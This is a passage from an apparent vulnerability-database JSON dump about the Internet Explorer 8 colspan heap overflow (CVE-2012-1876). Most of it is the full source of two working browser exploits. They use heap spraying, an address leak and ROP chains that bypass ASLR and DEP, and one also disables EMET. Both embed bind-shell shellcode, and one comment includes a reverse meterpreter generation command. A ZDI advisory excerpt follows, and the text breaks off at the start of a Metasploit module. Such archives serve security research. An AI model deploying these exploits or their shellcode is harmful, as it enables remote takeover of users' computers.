rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 
454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n\r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\r\n var 
rop = rop.toString(16);\r\n var rop41 = rop.substring(4,8);\r\n var rop42 = rop.substring(0,4); // } RET\r\n\r\n var shellcode = unescape(\"%u4444\");\r\n while (shellcode.length < 100)\r\n shellcode = shellcode + shellcode;\r\n var shellcode = shellcode.substr(0, 46);\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // EMET disable part 0x01 annihilate ROP protections\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument) \r\n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \r\n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\" \r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue \r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\r\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\r\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # 
RETN\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) \r\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\r\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\r\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\r\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\r\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\r\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\r\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\r\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n\r\n // Performing a standard Kumeh maneuver ... 
(VirtualProtect mona chain)\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n\r\n // Store various pointers here\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\r\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\r\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\r\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\r\n shellcode+= \"EMET\"; // EMET string\r\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // Store various pointers here\r\n\r\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread \r\n // MOV EAX,DWORD PTR DS:[076D10BCH]\r\n // MOV EAX,DWORD PTR DS:[007D25F48H]\r\n // MOV ESI,DWORD PTR [EAX+518H]\r\n // SUB ESP,2CCH\r\n // MOV DWORD PTR 
[ESP],10010H\r\n // MOV EDI,ESP\r\n // MOV ECX,2CCH\r\n // ADD EDI,4\r\n // SUB ECX,4\r\n // XOR EAX,EAX\r\n // REP STOS BYTE PTR ES:[EDI]\r\n // PUSH ESP\r\n // PUSH 0FFFFFFFEH\r\n // CALL ESI\r\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\r\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\r\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\r\n \"%ufe6a%ud6ff\");\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n // EMET disable part 0x02 end\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n 
\"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n evil_col.width = \"1312272\"; // 0x07D25E40\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35273/"}, {"lastseen": "2016-02-02T22:19:43", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass (MS12-037). CVE-2012-1876. 
Remote exploit for windows platform", "published": "2013-01-10T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "id": "EDB-ID:24017", "href": "https://www.exploit-db.com/exploits/24017/", "sourceData": "<!--\r\n** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass\r\n** Author: sickness@offsec.com\r\n** Thanks to Ryujin, Dookie and mr_me :) for their help.\r\n\r\n####################################################################\r\n\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb\r\n** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514\r\n** Old version of the exploit available at: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24017-old.zip\r\n\r\n####################################################################\r\n\r\n** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak :)\r\n** To get it working on a different version of Windows you will require to make your own chances to the exploit :)\r\n** Have fun :)\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00c2\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += 
string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = 
rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // Standard DEP bypass\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\r\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\r\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\r\n shellcode+= 
unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\r\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\r\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\r\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\r\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\r\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\r\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\r\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\r\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\r\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\r\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\r\n\r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp\r\n // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le\r\n\r\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\r\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\r\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\r\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\r\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\r\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\r\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\r\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\r\n 
\"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\r\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\r\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\r\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\r\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\r\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\r\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\r\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\r\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\r\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\r\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\r\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\r\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\r\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\r\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\r\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\r\n \"%u006a%uff53%u41d5\");\r\n\r\n // Total spray should be 1000\r\n var padding = unescape(\"%u9090\");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n\r\n shellcode+= padding;\r\n\r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n\r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n\r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n\r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\r\n var spray = new Array();\r\n\r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n\r\nfunction leak(){\r\n var leak_col = document.getElementById(\"132\");\r\n leak_col.width = \"41\";\r\n leak_col.span = \"19\";\r\n}\r\n\r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n\r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById(\"132\");\r\n 
evil_col.width = \"1245880\";\r\n evil_col.span = \"44\";\r\n}\r\n\r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n\r\n</script>\r\n</body>\r\n</html>", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24017/"}], "zdi": [{"lastseen": "2020-06-22T11:41:01", "bulletinFamily": "info", "cvelist": ["CVE-2012-1876"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Internet Explorer handles dynamically changed colspans on a column in a table with the table-layout:fixed style. If the colspan is increased after initial creation it will result in a heap overflow. 
This can lead to remote code execution under the context of the current program.", "edition": 3, "modified": "2012-06-22T00:00:00", "published": "2012-06-12T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-093/", "id": "ZDI-12-093", "title": "(Pwn2Own) Microsoft Internet Explorer Fixed Table Colspan Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T14:35:40", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-74062", "id": "SSV:74062", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = 